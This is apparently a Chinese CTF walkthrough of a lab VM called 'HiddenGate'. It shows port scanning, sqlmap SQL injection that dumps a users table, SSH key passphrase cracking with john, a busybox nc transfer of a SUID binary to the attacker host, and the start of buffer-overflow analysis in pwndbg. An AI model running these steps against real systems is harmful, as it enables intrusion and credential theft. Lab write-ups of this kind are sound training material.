❯ sudo arp-scan -l [sudo] password for Pepster: Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.60.1 00:50:56:c0:00:08 VMware, Inc. 192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc. 192.168.60.191 08:00:27:54:56:08 PCS Systemtechnik GmbH 192.168.60.254 00:50:56:f2:e6:ff VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.188 seconds (117.00 hosts/sec). 4 responded ❯ export ip=192.168.60.191 ❯ rustscan -a $ip .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- 0day was here ♥ [~] The config file is expected to be at "/home/Pepster/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.60.191:25565 [~] Starting Script(s) [~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-22 08:41 CST Initiating ARP Ping Scan at 08:41 Scanning 192.168.60.191 [1 port] Completed ARP Ping Scan at 08:41, 0.07s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 08:41 Completed Parallel DNS resolution of 1 host. at 08:41, 0.01s elapsed DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 08:41 Scanning 192.168.60.191 [1 port] Discovered open port 25565/tcp on 192.168.60.191 Completed SYN Stealth Scan at 08:41, 0.09s elapsed (1 total ports) Nmap scan report for 192.168.60.191 Host is up, received arp-response (0.00033s latency). Scanned at 2025-05-22 08:41:06 CST for 0s
PORT STATE SERVICE REASON 25565/tcp open minecraft syn-ack ttl 64 MAC Address: 08:00:27:54:56:08 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
2 [08:59:33] [INFO] retrieved: [08:59:38] [INFO] adjusting time delay to 1 second due to good response times information_schema [09:00:37] [INFO] retrieved: coffee available databases [2]: [*] coffee [*] information_schema
[09:00:54] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-05222025_0859am.csv'
[*] ending @ 09:00:54 /2025-05-22/
❯ sqlmap -u "http://192.168.60.191:25565/mine/login.php" --batch --forms -D coffee --tables …………………… [09:01:29] [INFO] retrieved: [09:01:39] [INFO] adjusting time delay to 1 second due to good response times users Database: coffee [1 table] +-------+ | users | +-------+
[09:01:53] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-05222025_0901am.csv'
[*] ending @ 09:01:53 /2025-05-22/
❯ sqlmap -u "http://192.168.60.191:25565/mine/login.php" --batch --forms -D coffee -T users --dump [09:02:21] [INFO] retrieved: id [09:02:27] [INFO] retrieved: username [09:02:50] [INFO] retrieved: password [09:03:18] [INFO] fetching entries for table 'users'in database 'coffee' [09:03:18] [INFO] fetching number of entries for table 'users'in database 'coffee' [09:03:18] [INFO] retrieved: 1 [09:03:19] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done) 2 [09:03:22] [INFO] retrieved: b0838efbde6accbc914c642981e4aef9 [09:05:15] [INFO] retrieved: user [09:05:27] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [y/N/q] N Database: coffee Table: users [1 entry] +----+----------------------------------+----------+ | id | password | username | +----+----------------------------------+----------+ | 2 | b0838efbde6accbc914c642981e4aef9 | user | +----+----------------------------------+----------+
[09:05:27] [INFO] table 'coffee.users' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/192.168.60.191/dump/coffee/users.csv' [09:05:27] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-05222025_0902am.csv'
www-data@HiddenGate:/tmp$ vi id_rsa www-data@HiddenGate:/tmp$ chmod 600 id_rsa www-data@HiddenGate:/tmp$ ssh xiaoyuega@localhost -i id_rsa The authenticity of host 'localhost (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Could not create directory '/var/www/.ssh' (Permission denied). Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts). Enter passphrase for key 'id_rsa':
echo"=== Starting Minecraft Server Backup ===" echo"Source: $SOURCE_DIR" echo"Destination: $BACKUP_DIR/$BACKUP_NAME"
# Check if source directory exists echo"[1/4] Checking source directory..." if [ ! -d "$SOURCE_DIR" ]; then echo"ERROR: Source directory $SOURCE_DIR does not exist!" exit 1 fi
# Create backup directory if it doesn't exist echo"[2/4] Preparing backup directory..." if [ ! -d "$BACKUP_DIR" ]; then echo"Backup directory doesn't exist, creating..." mkdir -p "$BACKUP_DIR" if [ $? -ne 0 ]; then echo"ERROR: Failed to create backup directory!" exit 1 fi fi
# Perform the backup using rsync echo"[3/4] Copying world data (this may take a while)..." rsync -a --copy-links --delete "$SOURCE_DIR/""$BACKUP_DIR/$BACKUP_NAME" chmod -R 755 "$BACKUP_DIR" if [ $? -ne 0 ]; then echo"ERROR: Backup failed!" exit 1 fi
# Verify backup echo"[4/4] Verifying backup..." if [ -d "$BACKUP_DIR/$BACKUP_NAME" ]; then echo"SUCCESS: Backup completed successfully!" echo"Backup location: $BACKUP_DIR/$BACKUP_NAME" else echo"ERROR: Backup verification failed!" exit 1 fi
www-data@HiddenGate:/opt/minecraft_server$ ssh-keygen -t rsa Generating public/private rsa key pair. Enter file inwhich to save the key (/var/www/.ssh/id_rsa): /opt/minecraft_server/id_rsa Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /opt/minecraft_server/id_rsa Your public key has been saved in /opt/minecraft_server/id_rsa.pub The key fingerprint is: SHA256:Jh0v6mePVs32jYdCAqSF6qNL2qDxDBEJRZg6XRg06Yg www-data@HiddenGate The key's randomart image is: +---[RSA 3072]----+ |.**+ . | |+.o.. . o | |=+ . . +. | |E.o . ...o | |.. . . S..o | | . o + .o = | |+ .. .. . + . + | |.X. . +. . + o| |o =. .+... . . | +----[SHA256]-----+ www-data@HiddenGate:/opt/minecraft_server$ cp id_rsa.pub authorized_keys
哎呀,之前备份过现在的文件夹权限是xiaoyuega的,不能新建文件夹了
卡在这了
哦,原来换个字典就能爆出来了
得到私钥密码fish
1 2 3 4 5 6 7 8 9 10 11
❯ john hash --wordlist=/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes Cost 2 (iteration count) is 16 for all loaded hashes Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status fish (id_rsa) 1g 0:00:00:06 DONE (2025-05-26 20:08) 0.1642g/s 84.07p/s 84.07c/s 84.07C/s 315475..marvin Use the "--show" option to display all of the cracked passwords reliably Session completed.
Root提权
由于22端口只在本地开放,直接用www-data的shell连吧
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
www-data@HiddenGate:/tmp/backup/backup_20250526_075124/123/.ssh$ ssh xiaoyuega@localhost -i id_rsa The authenticity of host 'localhost (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Could not create directory '/var/www/.ssh' (Permission denied). Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts). Enter passphrase for key 'id_rsa': Linux HiddenGate 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat May 10 13:51:19 2025 from 192.168.100.100 xiaoyuega@HiddenGate:~$ cat userrr.txt flag{73aec4f42ce3001c2cb27eb52d65f15d}
用户家目录存在cmd具有suid权限
传到本地,分析一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
xiaoyuega@HiddenGate:~$ ls -al total 48 drwxr-x--- 3 xiaoyuega xiaoyuega 4096 May 11 03:38 . drwxr-xr-x 3 root root 4096 May 10 12:17 .. lrwxrwxrwx 1 xiaoyuega xiaoyuega 9 May 10 12:49 .bash_history -> /dev/null -rw-r--r-- 1 xiaoyuega xiaoyuega 220 May 10 12:17 .bash_logout -rw-r--r-- 1 xiaoyuega xiaoyuega 3526 May 10 12:17 .bashrc -rwsr-sr-x 1 root root 17384 May 11 03:37 cmd -rw-r--r-- 1 xiaoyuega xiaoyuega 807 May 10 12:17 .profile drwx------ 2 xiaoyuega xiaoyuega 4096 May 10 13:40 .ssh -rw------- 1 xiaoyuega xiaoyuega 39 May 11 01:21 userrr.txt xiaoyuega@HiddenGate:~$ busybox nc 192.168.60.100 1234 < cmd ----------------------- ❯ nc -lvp 1234 > cmd listening on [any] 1234 ... 192.168.60.191: inverse host lookup failed: Unknown host connect to [192.168.60.100] from (UNKNOWN) [192.168.60.191] 37298
❯ gdb -q cmd pwndbg: loaded 188 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list. pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break) Reading symbols from cmd... (No debugging symbols found in cmd) ------- tip of the day (disable with set show-tips off) ------- Use the errno (or errno <number>) command to see the name of the last or provided (libc) error pwndbg> cyclic 300 aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa pwndbg> r Starting program: /home/Pepster/temp/cmd warning: opening /proc/self/mem file failed: Permission denied (13) [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Please enter command: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa
